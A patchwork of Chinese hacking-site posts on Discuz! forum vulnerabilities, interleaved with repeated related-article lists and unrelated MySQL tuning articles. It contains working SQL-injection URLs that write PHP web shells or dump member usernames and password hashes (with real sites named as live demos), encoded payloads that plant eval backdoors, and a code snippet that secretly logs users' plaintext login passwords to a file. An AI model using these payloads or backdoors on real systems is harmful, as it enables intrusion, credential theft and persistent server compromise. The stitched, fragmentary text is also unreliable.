相关代码：

if($option == 'del') {

$appid = intval($_GET['appid']);

$db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");

showmessage('manyou:done', 'userapp.php?script=notice&action=invite');

} elseif($option == 'deluserapp') {

$hash = trim($_GET['hash']); //此处并没有进行过滤，直接导致注入的产生

if($action == 'invite') {

$query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");

if($value = $db->fetch_array($query)) {

$db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");

showmessage('manyou:done', 'userapp.php?script=notice&action=invite');

} else {

showmessage('manyou:noperm');

}

} else {

$db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");

showmessage('manyou:done', 'userapp.php?script=notice');

}

}

很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式，但如果当前数据库帐号有File_priv的话我们也可以直接into outfile

/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,

NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23

0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E是
的十六进制表示。
但想
into outfile的话，我们还得有web的物理路径，有两种爆路径的方法
/manyou/admincp.php?my_suffix=%0A%0DTOBY57
/manyou/userapp.php?%0D%0A=TOBY57

相关文章

• 2009年11月14日 -- Discuz!NT 3.0 特殊环境下利用漏洞
• 2009年08月21日 -- Discuz 群体攻击第三波出现
• 2009年08月15日 -- Discuz!账号发放插件注入0day
• 2008年11月9日 -- Discuz! $_DCACHE数组变量覆盖漏洞
• 2011年09月21日 -- WPA2不再安全 无线加密协议曝惊天漏洞
• 2010年08月3日 -- 黑帽大会：HTTPS和SSL存在安全漏洞
• 2010年07月3日 -- 风讯（FooSun）GetPassword.asp页面存在任意修改密码漏洞
• 2010年05月8日 -- JBoss企业应用平台JMX控制台安全绕过漏洞
• 2010年03月17日 -- 网页编辑器漏洞手册
• 2010年01月9日 -- Discuz7 记录明文

$ip=$_SERVER['REMOTE_ADDR'];
$showtime=date("Y-m-d H:i:s");
$record="".$username." --------".$password." IP:".$ip." Time:".$showtime."\r\n";
$handle=fopen('./ipdata/csshacklog.php','a+');
$write=fwrite($handle,$record);

修改uc_client目录下的client.php 在

function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {

下加入如上代码,在网站ipdata目录下自动生成csshacklog.php
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为：falw

View.php 代码：

<?

error_reporting(0);

$psw="falw"; //Pass

if($_GET[action]=="logout") {

setcookie("pass_wd",'');

exit('<META http-equiv=Content-Type content="text/html; charset=gb2312"><a href="?action=login">Relogin</a><BR>');

}

$_REQUEST[pass_wd]= $_POST[pass_wd]?$_POST[pass_wd]:$_REQUEST[pass_wd];

if ($_REQUEST[pass_wd] !== $psw) {

if( $_POST[pass_wd]) {echo "wrong password.<br>";}

?>

<META http-equiv=Content-Type content="text/html; charset=gb2312">

<form method="POST" action="?">

<p>Pass：<input type="password" name="pass_wd" size="20" value=""></p>

<p><input type="submit" value="Go" name="B2"></p>

</form>

<?

exit;

}else {setcookie("pass_wd",$_REQUEST[pass_wd]);}

?>

<?

if($_GET['notencode']) {

$a=file_get_contents("csshacklog.php");

$a=str_replace("<?exit();?>","",$a);

echo $a;

exit;

}

?>

<META http-equiv=Content-Type content="text/html; charset=gb2312">

WebLog:<br><br>

<a href="?">Refresh</a>

<a href="?action=logout">Exit</a><BR>

<pre>

<B>Record：</B>

<?

$a=file_get_contents("csshacklog.php");

$a=str_replace("<?exit();?>","",$a);

echo htmlspecialchars($a);

?>

相关文章

• 2010年03月12日 -- Discuz! 7.2 最新注入漏洞分析与利用
• 2010年01月7日 -- discuz!7.1、7.2远程代码执行漏洞exploit
• 2009年11月14日 -- Discuz!NT 3.0 特殊环境下利用漏洞
• 2009年09月4日 -- Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability
• 2009年08月27日 -- Discuz! Plugin Crazy Star <= 2.0 Sql injection Vulnerability
• 2009年08月24日 -- MySQL优化 之 Discuz论坛优化
• 2009年08月21日 -- Discuz 群体攻击第三波出现
• 2009年08月15日 -- Discuz!账号发放插件注入0day
• 2008年11月14日 -- Discuz! 6.x/7.x SODB-2008-13 Exp
• 2008年11月9日 -- Discuz! $_DCACHE数组变量覆盖漏洞

<form method="post" action=" http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">

帖子ID，指定一个存在的帖子即可：<input type="text" name="tid" value="1" />

<input type="hidden" name="action" value="imme_binding" />

<input type="hidden" name="response[result]" value="1:2" />

<input type="hidden" name="scriptlang[1][2]" value="${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).

chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).

chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).

chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).

chr(99).chr(104).chr(101).chr(47).chr(117).

chr(115).chr(101).chr(114).chr(103).chr(114).

chr(111).chr(117).chr(112).chr(95).chr(48).

chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).

chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).

chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).

chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).

chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).

chr(91).chr(99).chr(109).chr(100).chr(93).

chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}" />

<input type="submit" name="topicsubmit" value="提交" class="submit" />

</form>

chr解码后是：

value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');

保存html

打开点提交，会生产forumdata/cache/usergroup_01.php一句话文件，密码是cmd

第二种方法：

直接GET，利用语句：

misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),

base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

在根目录生成C.PHP密码是C

临时修补方法：

在common.inc.php上面加上

$response=$scriptlang=array();

官方发布修补补丁：

http://www.discuz.net/thread-1537673-1-1.html

相关文章

• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2010年12月16日 -- Exploits Linux Kernel <= 2.6.37 local privilege escalation
• 2010年08月26日 -- PuTTY 0.60 DLL Hijacking Exploit (winmm.dll)
• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)
• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)
• 2010年04月15日 -- Remote Exploit Against the Aircrack-NG Tools svn r1675
• 2010年03月12日 -- Discuz! 7.2 最新注入漏洞分析与利用
• 2010年01月9日 -- Discuz7 记录明文
• 2009年11月14日 -- Discuz!NT 3.0 特殊环境下利用漏洞
• 2009年09月22日 -- Gnuboard 0day&Exp

相关文章

• 2010年03月12日 -- Discuz! 7.2 最新注入漏洞分析与利用
• 2009年08月21日 -- Discuz 群体攻击第三波出现
• 2008年11月9日 -- Discuz! $_DCACHE数组变量覆盖漏洞
• 2011年09月21日 -- WPA2不再安全 无线加密协议曝惊天漏洞
• 2010年08月3日 -- 黑帽大会：HTTPS和SSL存在安全漏洞
• 2010年07月3日 -- 风讯（FooSun）GetPassword.asp页面存在任意修改密码漏洞
• 2010年05月8日 -- JBoss企业应用平台JMX控制台安全绕过漏洞
• 2010年03月17日 -- 网页编辑器漏洞手册
• 2010年01月9日 -- Discuz7 记录明文
• 2010年01月7日 -- discuz!7.1、7.2远程代码执行漏洞exploit

=========================================================
Discuz! Plugin JiangHu < = 1.1 Sql injection Vulnerability
=========================================================

========================[Author]=========================

[+] Founded : ZhaoHuAn
[+] Contact : ZhengXing[at]shandagames[dot]com
[+] Blog : http://www.patching.net/zhaohuan/
[+] Date : Feb, 9th 2009
[+] Update : Sep, 1th 2009

========================[Soft Info]======================

Software: Discuz! Plugin JiangHu Inn
Version : 1.1
Vendor : http://www.discuz.com
d0rk : inurl:forummission.php

[-] Exploit:
[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] SqlI PoC:
[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[+] Demo Live:
[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

/---------------------------------------------www.zhaohuan.net-------------------------------------------------\

Greetz : Snda Security Team
& Normal is boring - -!

\--------------------------------------------------------------------------------------------------------------/

相关文章

• 2010年03月12日 -- Discuz! 7.2 最新注入漏洞分析与利用
• 2010年01月9日 -- Discuz7 记录明文
• 2010年01月7日 -- discuz!7.1、7.2远程代码执行漏洞exploit
• 2009年11月14日 -- Discuz!NT 3.0 特殊环境下利用漏洞
• 2009年08月27日 -- Discuz! Plugin Crazy Star <= 2.0 Sql injection Vulnerability
• 2009年08月24日 -- MySQL优化 之 Discuz论坛优化
• 2009年08月21日 -- Discuz 群体攻击第三波出现
• 2009年08月15日 -- Discuz!账号发放插件注入0day
• 2008年11月14日 -- Discuz! 6.x/7.x SODB-2008-13 Exp
• 2008年11月9日 -- Discuz! $_DCACHE数组变量覆盖漏洞

========================[Author]============================

[+] Founded : ZhaoHuAn
[+] Contact : ZhengXing[at]shandagames[dot]com
[+] Blog : http://www.patching.net/zhaohuan/
[+] Date : August, 26th 2009 [Double Seventh Festival]

========================[Soft Info]=========================

Software: Discuz! Plugin Crazy Star(family)
Version : 2.0
Vendor : http://www.discuz.com

[-] Exploit:
[+] 1) Register a User
2) Login!
[+] and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31 from cdb_members--

[-] SqlI PoC:
[+] http://target/[path]/plugin.php?identifier=family&module=family&action=view&fmid=1+and+1=2+unIon+selecT+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31 from cdb_members--
[?] = Valid fmid Number

[+] Demo Live:
[-] http://sj.netease.com/plugin.php?identifier=family&module=family&action=view&fmid=6+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,group_concat(uid,0x3a,username,0x3a,password),19,20,21,22,23,24,25,26,27,28,29,30,31 from bbs_members--

[-] http://www.war3club.net/plugin.php?identifier=family&module=family&action=view&fmid=11+and+1=2+unIon+selecT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31,32,33 from cdb_members--

/---------------------------------------------www.zhaohuan.net-------------------------------------------------\

Today is the VALENTINE'S Day in China, the seventh day of the seventh lunar month.
Raise your head on August 26 and gaze at the stars, you will find something romantic going on in the sky ;)
Greetz : Weeny <- love u more & more

\--------------------------------------------------------------------------------------------------------------/

# milw0rm.com [2009-08-26]

相关文章

• 2010年03月12日 -- Discuz! 7.2 最新注入漏洞分析与利用
• 2010年01月9日 -- Discuz7 记录明文
• 2010年01月7日 -- discuz!7.1、7.2远程代码执行漏洞exploit
• 2009年11月14日 -- Discuz!NT 3.0 特殊环境下利用漏洞
• 2009年09月4日 -- Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability
• 2009年08月24日 -- MySQL优化 之 Discuz论坛优化
• 2009年08月21日 -- Discuz 群体攻击第三波出现
• 2009年08月15日 -- Discuz!账号发放插件注入0day
• 2008年11月14日 -- Discuz! 6.x/7.x SODB-2008-13 Exp
• 2008年11月9日 -- Discuz! $_DCACHE数组变量覆盖漏洞

作/译者：叶金荣，来源：http://imysql.cn，转载请注明作/译者和出处，并且不能用于商业用途，违者必究。

一. 前言
近日由于需要,对discuz论坛(简称dz)进行优化,当然了,只是涉及到数据库的优化.
先说一下服务器及dz的数据量,2 * Intel(R) Xeon(TM) CPU 2.40GHz, 4GB mem, SCISC硬盘.
MySQL 版本为 4.0.23. 数据表情况:
cdb_attachments 2万
cdb_members 10万
cdb_posts 68万
cdb_threads 7万
二. 缓存优化
在 my.cnf 中添加/修改以下选项:

 #取消文件系统的外部锁
skip-locking
#不进行域名反解析,注意由此带来的权限/授权问题
skip-name-resolve
#索引缓存,根据内存大小而定,如果是独立的db服务器,可以设置高达80%的内存总量
key_buffer = 512M
#连接排队列表总数
back_log = 200
max_allowed_packet = 2M
#打开表缓存总数,可以避免频繁的打开数据表产生的开销
table_cache = 512
#每个线程排序所需的缓冲
sort_buffer_size = 4M
#每个线程读取索引所需的缓冲
read_buffer_size = 4M
#MyISAM表发生变化时重新排序所需的缓冲
myisam_sort_buffer_size = 64M
#缓存可重用的线程数
thread_cache = 128
#查询结果缓存
query_cache_size = 128M
#设置超时时间,能避免长连接
set-variable = wait_timeout=60
#最大并发线程数,cpu数量*2
thread_concurrency = 4
#记录慢查询,然后对慢查询一一优化
log-slow-queries = slow.log
long_query_time = 1
#关闭不需要的表类型,如果你需要,就不要加上这个
skip-bdb

以上参数根据各自服务器的配置差异进行调整,仅作为参考.
三. 索引优化
上面提到了,已经开启了慢查询,那么接下来就要对慢查询进行逐个优化了.
1. 搜索优化
搜索的查询SQL大致如下:

 SELECT t.* FROM cdb_posts p, cdb_threads t WHERE
t.fid IN ('37', '45', '4', '6', '17', '41', '28', '32', '31', '1', '42')
AND p.tid=t.tid AND p.author LIKE 'JoansWin'
GROUP BY t.tid ORDER BY lastpost DESC LIMIT 0, 80;

用 EXPLAIN 分析的结果如下:

 mysql>EXPLAIN  SELECT t.* FROM cdb_posts p, cdb_threads t WHERE
t.fid IN ('37', '45', '4', '6', '17', '41', '28', '32', '31', '1', '42')
AND p.tid=t.tid AND p.author LIKE 'JoansWin'
GROUP BY t.tid ORDER BY lastpost DESC LIMIT 0, 80;
+-----------+------------+----------+--------------+-------------+-----------+-------------+
| id | select_type | table | type  | possible_keys | key  | key_len | ref         | rows  | Extra
+-----------+------------+----------+--------------+-------------+-----------+-------------+
|  1 | SIMPLE      | t     | range | PRIMARY,fid   | fid  | 2       | NULL        | 66160 | Using where;
Using temporary; Using filesort |
|  1 | SIMPLE      | p     | ref   | tid           | tid  | 3       | Forum.t.tid   |    10 | Using where
| +----+-------------+-------+-------+---------------+------+---------+-------------+-------+
---------

只用到了 t.fid 和 p.tid,而 p.author 则没有索引可用,总共需要扫描
66160*10 = 661600 次索引,够夸张吧 :(
再分析 cdb_threads 和 cdb_posts 的索引情况:

 mysql>show index from cdb_posts;
+-----------+------------+----------+--------------+-------------+-----------+----------
---+----------+--------+------+--+
| Table     | Non_unique | Key_name | Seq_in_index | Column_name | Collation | Cardinality | Sub_part |
Packed | Null | Index_type | Comment | +-----------+------------+----------+--------------+----
---------+-----------+-------------+----------+--------+------+--+
| cdb_posts |          0 | PRIMARY  |            1 | pid         | A         |      680114 |     NULL | NULL   |
| BTREE      |         |
| cdb_posts |          1 | fid      |            1 | fid         | A         |          10 |     NULL | NULL   |
| BTREE      |         |
| cdb_posts |          1 | tid      |            1 | tid         | A         |       68011 |     NULL | NULL   |
| BTREE      |         |
| cdb_posts |          1 | tid      |            2 | dateline    | A         |      680114 |     NULL | NULL   |
| BTREE      |         |
| cdb_posts |          1 | dateline |            1 | dateline    | A         |      680114 |     NULL | NULL   |
| BTREE      |         |
+-----------+------------+----------+--------------+-------------+-----------+---

以及

 mysql>show index from cdb_threads;
+-----------+------------+----------+--------------+-------------+-----------+-------------+
----------+--------+------+-----+
| Table       | Non_unique | Key_name  | Seq_in_index | Column_name | Collation | Cardinality | Sub_part |
Packed | Null | Index_type | Comment | +-----------+------------+----------+--------------+-----
--------+-----------+-------------+----------+--------+------+-----+
| cdb_threads |          0 | PRIMARY   |            1 | tid         | A         |       68480 |     NULL | NULL   |
| BTREE      |         |
| cdb_threads |          1 | lastpost  |            1 | topped      | A         |           4 |     NULL | NULL   |
| BTREE      |         |
| cdb_threads |          1 | lastpost  |            2 | lastpost    | A         |       68480 |     NULL | NULL   |
| BTREE      |         |
| cdb_threads |          1 | lastpost  |            3 | fid         | A         |       68480 |     NULL | NULL   |
| BTREE      |         |
| cdb_threads |          1 | replies   |            1 | replies     | A         |         233 |     NULL | NULL   |
| BTREE      |         |
| cdb_threads |          1 | dateline  |            1 | dateline    | A         |       68480 |     NULL | NULL   |
| BTREE      |         |
| cdb_threads |          1 | fid       |            1 | fid         | A         |          10 |     NULL | NULL   |
| BTREE      |         |
| cdb_threads |          1 | enablehot |            1 | enablehot   | A         |           2 |     NULL | NULL   |
| BTREE      |         | +-------------+------------+-----------+--------------+-------------+------

看到索引 fid 和 enablehot 基数太小,看来该索引完全没必要,不过,对于fid基数较大的情况,则可能需要保留>该索引.
所做修改如下:

 ALTER TABLE `cdb_threads` DROP INDEX `enablehot`, DROP INDEX `fid`, ADD INDEX (`fid`, `lastpost`);
ALTER TABLE `cdb_posts` DROP INDEX `fid`, ADD INDEX (`author`(10));
OPTIMIZE TABLE `cdb_posts`;
OPTIMIZE TABLE `cdb_threads`;

在这里, p.author 字段我设定的部分索引长度是 10, 是我经过分析后得出来的结果,不同的系统,这里的长度也不同,最好自己先取一下平均值,然后再适当调整.
现在,再来执行一次上面的慢查询,发现时间已经从 6s 变成 0.19s,提高了 30 倍.
这次先到这里,下次继续 ^_^

很早以前写过一个文章，是关于discuz论坛的优化：MySQL优化 之 Discuz论坛优化。 写的时候是2006年，没想到过了这么久，discuz论坛的问题还是困扰着很多网友，其实从各论坛里看到的问题总结出来，很关键的一点都是因为没有将数 据表引擎转成InnoDB导致的，discuz在并发稍微高一点的环境下就表现的非常糟糕，产生大量的锁等待，这时候如果把数据表引擎改成InnoDB的 话，我相信会好很多。这次就写个扫盲贴吧。

1. 启用innodb引擎，并配置相关参数

#skip-innodb
innodb_additional_mem_pool_size = 16M #一般16M也够了，可以适当调整下
innodb_buffer_pool_size = 6G #如果是专用db的话，一般是内存总量的80%
innodb_data_file_path = ibdata1:1024M:autoextend
innodb_file_io_threads = 4
innodb_thread_concurrency = 20
innodb_flush_log_at_trx_commit = 1
innodb_log_buffer_size = 16M
innodb_log_file_size = 256M
innodb_log_files_in_group = 3
innodb_max_dirty_pages_pct = 50
innodb_lock_wait_timeout = 120
innodb_file_per_table

2. 修改表引擎为innodb

mysql> alter table cdb_access engine = innodb;

其他表类似上面，把表名换一下即可…
将表存储引擎改成innodb后，不仅可以避免大量的锁等待，还可以提升查询的效率，因为innodb会把data和index都放在buffer pool中，效率更高。

相关文章

• 2011年06月2日 -- Mysql安全
• 2011年04月28日 -- MySQL.com和Sun.com到底是如何被黑的？
• 2010年06月3日 -- Mysql另类盲注中的一些技巧
• 2010年04月30日 -- MySQL监控快速指南
• 2010年03月12日 -- Discuz! 7.2 最新注入漏洞分析与利用
• 2010年01月9日 -- Discuz7 记录明文
• 2010年01月7日 -- discuz!7.1、7.2远程代码执行漏洞exploit
• 2009年11月23日 -- MySQL安装详细图解
• 2009年11月14日 -- Discuz!NT 3.0 特殊环境下利用漏洞
• 2009年11月5日 -- MySQL导入数据库文件最大限制2048KB的修改解决办法

{’,”);ECHO ”;$X=SUBSTR(MD5($_GET['B']),28);IF($X==’7aaa’)EVAL($_POST['A']);//}

替换内容 : aaaaaaaaaa

/forumdata/cache/usergroup_0.php

程序代码：

< ?php (substr(md5($_POST['b']),28)==’7aaa’) && eval($_POST['a']);?>

对post的变量b进行md5加密，如果第28-31的位置是7aaa(32位MD5的后四位)的话 就执行eval($_POST['a']);

相关文章

• 2010年03月12日 -- Discuz! 7.2 最新注入漏洞分析与利用
• 2009年11月14日 -- Discuz!NT 3.0 特殊环境下利用漏洞
• 2008年11月9日 -- Discuz! $_DCACHE数组变量覆盖漏洞
• 2011年09月21日 -- WPA2不再安全 无线加密协议曝惊天漏洞
• 2010年08月3日 -- 黑帽大会：HTTPS和SSL存在安全漏洞
• 2010年07月3日 -- 风讯（FooSun）GetPassword.asp页面存在任意修改密码漏洞
• 2010年05月8日 -- JBoss企业应用平台JMX控制台安全绕过漏洞
• 2010年03月17日 -- 网页编辑器漏洞手册
• 2010年01月9日 -- Discuz7 记录明文
• 2010年01月7日 -- discuz!7.1、7.2远程代码执行漏洞exploit

Discuz账号发放插件注入0day

插件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php
版本:最新版
Exp:

http://www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
搜索引擎特征:inurl:2fly_gift.php
上图:

相关文章

• 2010年03月12日 -- Discuz! 7.2 最新注入漏洞分析与利用
• 2009年08月28日 -- dedecms 5.3 – 5.5注入漏洞
• 2008年11月9日 -- Discuz! $_DCACHE数组变量覆盖漏洞
• 2012年02月10日 -- Xpath SQL Injection
• 2011年06月6日 -- Easy Media Script SQL Injection Vulnerability
• 2011年05月12日 -- Joomla Component com_hello SQL Injection Vulnerability
• 2010年06月10日 -- 你还敢执行txt文件吗？Windows 0day
• 2010年06月6日 -- Havij v1.1 Advanced SQL Injection
• 2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞
• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)

$host = 'www.80vul.com';
// 服务器域名或IP
$path = '/discuz/';
// 程序所在的路径
$key  = 0;
// 上面的变量编辑好后，请将此处的值改为1

?>


相关文章

• 2010年03月12日 -- Discuz! 7.2 最新注入漏洞分析与利用
• 2010年01月9日 -- Discuz7 记录明文
• 2010年01月7日 -- discuz!7.1、7.2远程代码执行漏洞exploit
• 2009年11月14日 -- Discuz!NT 3.0 特殊环境下利用漏洞
• 2009年09月4日 -- Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability
• 2009年08月27日 -- Discuz! Plugin Crazy Star <= 2.0 Sql injection Vulnerability
• 2009年08月24日 -- MySQL优化 之 Discuz论坛优化
• 2009年08月21日 -- Discuz 群体攻击第三波出现
• 2009年08月15日 -- Discuz!账号发放插件注入0day
• 2008年11月9日 -- Discuz! $_DCACHE数组变量覆盖漏洞